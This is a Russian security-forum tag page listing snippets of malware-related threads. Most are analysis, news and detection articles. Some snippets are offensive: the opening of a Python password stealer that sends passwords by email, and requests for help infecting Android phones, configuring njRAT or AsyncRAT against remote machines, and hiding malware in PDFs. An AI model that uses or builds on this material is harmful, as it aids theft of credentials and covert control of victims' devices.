• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

malware

  1. Codeby News

    News Злоумышленники заражают разработчиков .NET через репозиторий NuGet

    Эксперты компании JFrog сообщили о новых атаках на разработчиков .NET через пакеты из репозитория NuGet. Злоумышленники маскируют свои вредоносные пакеты под реально существующие инструменты, используя технику тайпсквоттинга. Некоторые из этих пакетов были загружены более 150 000 раз за месяц...
  2. Codeby News

    News Вредоносные моды для Dota 2 обнаружены в магазине Steam

    Специалисты из компании Avast Threat Labs выявили четыре вредоносных мода для игры Dota 2, которые размещены в онлайн-магазине игр Steam. "Обнаруженные вредоносные моды размещены под именами Overdog no annoying heroes (id 2776998052), Custom Hero Brawl (id 2780728794) и Overthrow RTZ Edition...
  3. Mark Klintov

    Работа и анализ. Какую малварь разобрать?

    На форуме была замечена достаточно сильная активность в теме реверса. Чтобы не писать об устаревших малварях или очень малоизвестных ратниках предлагаю скинуть название любого вируса для анализа. По нему будет проведена исследовательская работа и выложена статья. Свои варианты предлагайте ниже...
  4. Mark Klintov

    Статья Вирусы под микроскопом. Собираем утилиты для анализа малвари

    Введение В последнее время ты слышишь про огромное количество взломов крупных компаний с использованием вредоносного ПО. В инструментарий для атак входят шифровальщики, программы-вымогатели. Поэтому специалистам по информационной безопасности не редко приходится прибегать к множеству утилит для...
  5. HellaHillz

    Как вшить малварь в PDF

    Добрый день, много где искал ответ на этот вопрос - нашёл только модуль msf 2010 года для Adobe, и то он для пейлоадов. Получается никак нельзя вшить?
  6. Mogen

    Статья RotaJakiro: Долгоживущий секретный бэкдор с 0 обнаружениями на VirusTotal [ Перевод ]

    🖐 Приветствую всех читателей Codeby.net 🖐 Недавно специалисты Qihoo 360 Netlab обнаружили очень интересный бэкдор, который получил название RotaJakiro. Данный бэкдор имел 0 обнаружений на VirusTotal длительное количество времени. Специалисты Qihoo 360 Netlab написали статью об этом бэкдоре в...
  7. xxxzsx

    Как удалить склейку с вирусом и получить незараженный исполняемый файл?

    Какие инструменты могут помочь разобрать и удалить склейку, чтобы вернуть программу в исходный вид? Вручную через рефлектор/подобное либо автоматом если для этого что-то существует? Ни один из антивирусов, которые хвастаются кнопкой «вылечить файл», не вылечил ничего из того что у меня имеется...
  8. Keil

    Заразить удалённо Android-телефон.

    Доброго времени суток! Возник такой вот вопрос. Как можно заразить малварём телефон на Android? Само устройство- Redmi Note 8 Pro, если это имеет значение. Пытался делать билды в AhMyth, SpyNote 6.4, всё без толку. При попытке установить APK выдаёт ошибку "файл недоступен". В SpyNote билд...
  9. F

    Гостевая статья BEWARE !CHINESE GoLang MALWARE MAKING SERVERS A CRYPTOMINER

    In this article, we will talk about a campaign which is being run by Chinese Cyber criminals and this time they don’t want to watch what we are doing, rat her they want some resou rce s from our system to mine cryptocurrency. Some researchers from Barracuda have researched about a new variant...
  10. G

    Soft Стиллер паролей на python с отправкой на почту

    Стиллер с отправкой паролей на электронную почту. Очень прост в использовании. :) #!/usr/bin/python import smtplib import base64, os, sys, re import sqlite3 import socket import platform import uuid sender = '' reciever = '' password = '' # Dont change this marker = "Morwy" def wifipass()...
  11. Zer0must2b

    Soft Софт Dangerzone: преобразователь потенциально опасных файлов

    Программа берет потенциально опасные PDF-файлы, офисные документы или изображения и конвертирует их в безопасный PDF-файл. Dangerzone работает следующим образом: вы даете ему документ, в котором не уверенны, можете ли вы ему доверять (например, вложение электронной почты). Внутри песочницы...
  12. F

    Есть ли вредонос на android устройстве.

    Доброго времени суток, однажды ко мне подошел товарищ и рассказал о своих подозрениях по поводу наличия малвари внутри его Android девайса. Попрошу не кидаться ссаными тряпками, а принять существующие условия - как должное.) 1. Девайс этому человеку подарен и менять он его не собирается. 2...
  13. Zer0must2b

    Гостевая статья Способы распаковать мобильное вредоносное ПО

    В этой статье кратко описываются методы распаковки мобильных вредоносных программ. Он будет сосредоточен на Anubis, так как это последнее популярное вредоносное ПО уже почти год. Актеры используют приложения-капельницы в качестве основного метода распространения. Дропперы находят свои пути в...
  14. crew

    Статья Как обнаружить присутствие вредоносного кода в файле, если антивирус молчит

    В статье описаны начальные методы и техники выявления вредоносного кода в файлах, и в каких условиях стоит обследовать малварь. Первым делом что нам предстоит сделать, во избежание заражения инфраструктуры малварью это: Изолировать потенциально зараженный ПК от других сетей Сделать дамп...
  15. T

    Исключить сайты из антивирусных баз, False positive

    Здравствуйте! конкуренты каким-то образом добавили наши сайты как фишинг в разные базы антивирусов,но сайты -чистые, на многие отправили письма о ложном включении,они оперативно исключили,но от bitdefender никакой реакции... отправляли false positive через официальную форму "URL Submit" с разных...
  16. S

    Как настроить порты в Njrat | AsyncRat

    Всем привет! Есть AsyncRat, аналог njrat. Прекрасно работает в одной сети, localhost. Но когда запускаешь на другом пк, попросту главная машина (атакующая) не видит атакуемую. Это скорее всего связано с тем, что задаю DNS 192.168.1.... - IPv4 Но мне нужно, чтобы атакуемая машина, могла...
  17. S

    Njrat0.7d как запустить?

    Доброй ночи. Скачал njrat c github https://github.com/malwares/Remote-Access-Trojan/tree/master/NJRAT Не знаю, как запустить builder, пробовал запускать Njrat0.7d.exe, ничего не происходит.
  18. Sunnych

    Статья TeamViewer encryption tvr.cfg или разбор конфигурации TeamSpy

    Уже не впервой хакеры используют для взлома и удаленного управления готовые программы, которые модернизируют для своих задач, раньше да и сейчас это: Radmin, DameWare, Omniquad Instant Remote Control, Remote Desktop Control, Remote Desktop Professional, Hidden Administrator, Activity Monitor...
  19. PingVinich

    Статья [0x07] Исследуем Portable EXEcutable [Пишем полноценный инфектор]

    Все статьи цикла Доброго времени суток, форумчане! Эта статья является логическим продолжением сразу для двух статей - для статьи о DLL инъекциях и для статьи об инфицировании .exe файлов. Только задумайтесь, что будет, если смешать два этих способа? (Для полноценного понимания требуется...
  20. PingVinich

    Статья [0x06] Исследуем Portable Executable [DLL инъекции]

    Все статьи цикла Салют, друзья! На дворе 2018 год, а мы с вами начинаем изучать DLL инъекции :). Не смотря на то, что эта техника уже много раз заезжена и всем известна, я всё же внесу свои 5 копеек, так как в будующих статьях мы будем частенько прибегать к этой технике и я просто не мог...